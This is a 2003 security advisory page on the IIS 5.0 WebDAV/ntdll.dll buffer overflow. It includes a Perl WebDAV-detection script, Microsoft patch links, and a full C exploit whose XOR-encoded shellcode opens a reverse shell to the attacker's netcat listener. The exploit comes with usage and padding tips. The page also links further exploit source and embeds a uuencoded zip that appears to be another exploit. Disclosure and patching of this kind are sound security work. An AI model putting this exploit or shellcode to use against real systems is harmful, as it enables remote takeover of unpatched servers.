18th Mar 2003 [SBWID-6073]
COMMAND
IIS remote buffer overflow due to WebDAV/ntdll.dll
SYSTEMS AFFECTED
IIS 5.0
PROBLEM
In CERT Advisory [CA-2003-09] :
http://www.cert.org/advisories/CA-2003-09.html
--snip--
IIS 5.0 includes support for WebDAV, which allows users to manipulate
files stored on a web server (RFC2518). A buffer overflow
vulnerability exists in ntdll.dll (a portion of code utilized by the
IIS WebDAV component). By sending a specially crafted request to an
IIS 5.0 server, an attacker may be able to execute arbitrary code in
the Local System security context, essentially giving the attacker
compete control of the system.
--snap--
Update (19 March 2003)
======
Brett Moore [[email protected]] adds :
Also if anyone is writing IDS or filtering systems, most of the webdav
methods can be used to exploit this.
These are some that I have found that can lead to exploitation.
LOCK
SEARCH
PROPFIND
COPY
MKCOL
-Also-
SensePost Research [http://www.sensepost.com] wrote a WebDAV scanning
tool :
> head -n 9 finder.pl
#!/bin/perl
##
## This script test for most of the methods used by WebDAV
## If the server does not complain about the method its an indication
## that WebDAV is in use..
##
## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
## for info why this is interesting..
##
Typical output:
> perl finder.pl www.blah.co.za 80
Testing WebDAV methods [www.blah.co.za 80]
-------------------------------------
www.blah.co.za : Server type is Microsoft-IIS/5.0
Method PROPFIND seems to be allowed - WebDAV possibly in use
Method PROPPATCH seems to be allowed - WebDAV possibly in use
Method MCOL seems to be allowed - WebDAV possibly in use
Method PUT seems to be allowed - WebDAV possibly in use
Method DELETE seems to be allowed - WebDAV possibly in use
Method LOCK seems to be allowed - WebDAV possibly in use
Method UNLOCK seems to be allowed - WebDAV possibly in use
> perl finder.pl www.moreblah.com 80
Testing WebDAV methods [www.moreblah.com 80]
-------------------------------------
www.moreblah.com : Server type is Microsoft-IIS/5.0
Method PROPFIND is not allowed
Method PROPPATCH is not allowed
Method MCOL is not allowed
Method PUT is not allowed
Method DELETE is not allowed
Method LOCK is not allowed
Method UNLOCK is not allowed
#!/bin/perl
##
## This script test for most of the methods used by WebDAV
## If the server does not complain about the method its an indication
## that WebDAV is in use..
##
## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
## for info why this is interesting..
##
## SensePost Research
## [email protected]
## 2003/3/17
## RT
$|=1;
use Socket;
@methods = ("PROPFIND","PROPPATCH","MCOL","PUT","DELETE","LOCK","UNLOCK");
if ($#ARGV<1){die "parameters: IP/dns_name port\n";}
$target=@ARGV[0];
$port=@ARGV[1];
print "Testing WebDAV methods [$target $port]\n-------------------------------------\n";
@results=sendraw2("HEAD / HTTP/1.0\r\n\r\n",$target,$port,15);
if ($#results < 1){die "15s timeout to $target on port $port\n";}
foreach $line (@results){
if ($line =~ /Server:/){
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Server type is $right";
if ($right !~ /Microsoft-IIS\/5.0/i){
print "$target : Not a Microsoft IIS 5 box\n";
exit(0);
}
}
}
foreach $method (@methods){
@results=sendraw2("$method /test/nothere HTTP/1.0\r\n\r\n",$target,$port,15);
if ($#results < 1){print "15s timeout to $target on port $port\n";}
$okflag=0;
foreach $line (@results){
if ($line =~ /Method Not Supported/i){
print "Method $method is not allowed\n";
$okflag=1;
}
if (($line =~ /method/i) && ($line =~ /not allowed/i)){
print "Method $method is not allowed\n";
$okflag=1;
}
}
if ($okflag==0){
print "Method $method seems to be allowed - WebDAV possibly in use\n";
}
}
########## Sendraw-2
sub sendraw2 {
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2 = inet_aton($realip);
my $flagexit=0;
$SIG{ALRM}=\&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
alarm($timeout);
if (connect(S,pack "SnA4x8",2,$realport,$target2)){
alarm(0);
my @in;
select(S); $|=1;
print $pstr;
alarm($timeout);
while(<S>){
if ($flagexit == 1){
close (S);
print STDOUT "Timeout\n";
return "Timeout";
}
push @in, $_;
}
alarm(0);
select(STDOUT);
close(S);
return @in;
} else {return "0";}
}
sub ermm{
$flagexit=1;
close (S);
}
Update (22 March 2003)
======
David Litchfield of NGSSoftware Ltd [http://www.ngssoftware.com/] adds
:
The patch announced by Microsoft on the 17th March 2003 fixed a
security vulnerability in the core of the Windows 2000 operating
system. This flaw was actively being exploited through WebDAV requests
to Microsoft's Internet Information Server 5. It must be stressed that
IIS was simply the attack vector; the method or route used to actually
exploit the flaw. The problem, however, is much wider in scope than
just simply machines running IIS. Researchers at NGSSoftware have
isolated many more attack vectors including java based web servers and
other non-WebDAV related issues in IIS. Due to this, NGSSoftware urge
Windows 2000 users to apply the patch.
For a paper that examines the vulnerability in detail, please read :
http://www.ngssoftware.com/papers/ms03-007-ntdll.pdf
Update (24 March 2003)
======
Thanks to Rafael N��ez [[email protected]]
[http://www.scientech.com.ve], Senior Research Scientist :
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* I know I code like a pig, my english sucks, and my tech too */
/* it is my first exploit..and my first shellcode..sorry :P */
/* if you have comments feel free to mail me at: */
/* mailto: [email protected] */
/* or visit us at www.coromputer.net . You can speak with us */
/* at IRC undernet channel #coromputer */
/* ok now the greetz: */
/* [El0d1e] to help me find some information about the bug :) */
/* tuck_ to support me ;) */
/* and all my friends in coromputer crew! hein les poulets! =) */
/* */
/* Tested by Rafael [RaFa] Nunez [email protected] */
/* */
/* (take off the WSAStartup, change the closesocket, change */
/* headers and it will run on linux boxes ;pPpPpP ). */
/* */
/*******************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";
int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";
if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}
if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}
sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}
printf("Checking WebDav on '%s' ... ",host);
if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}
void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
return;
}
void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}
if(test_host(argv[1]))
return;
if(argc==5)
PAD+=atoi(argv[4]);
printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
ip = inet_addr(argv[2]); ip1 = (char*)&ip;
shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];
port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];
// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}
if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);
/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}
Update (26 march 2003)
======
Roman Medina [[email protected]] adds :
I wrote another exploit for the nt.dll bug some days ago. Explanation
and a little documentation is included in the source file. It compiles
in Linux/gcc without any error.
http://www.rs-labs.com/exploitsntools/rs_iis.c
-Also-
Mat [[email protected]] posts :
UUEncode
begin 644 webdav.zip
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
M```)``````````$`(`````````!W96)D878N<&Q02P4&``````$``0`W````
&*Q4`````
`
end
5496 bytes
SOLUTION
Windows 2000: Registry Tool for Security Patch: Unchecked buffer in
Windows component could cause web server compromise
http://www.microsoft.com/downloads/details.aspx?FamilyID=48b3a74e-a4af-41d6-bdec-1b6104648647&DisplayLang=en
Windows 2000: Active Directory Group Policy for Security Patch:
Unchecked buffer in Windows component could cause web server compr
http://www.microsoft.com/downloads/details.aspx?FamilyID=a3b109d3-6f0e-4b1c-a723-976566fc1b53&DisplayLang=en
Windows 2000 Security Patch: IIS Remote Exploit from ntdll.dll
vulnerability
http://www.microsoft.com/downloads/details.aspx?FamilyID=c9a38d45-5145-4844-b62e-c69d32ac929b&DisplayLang=en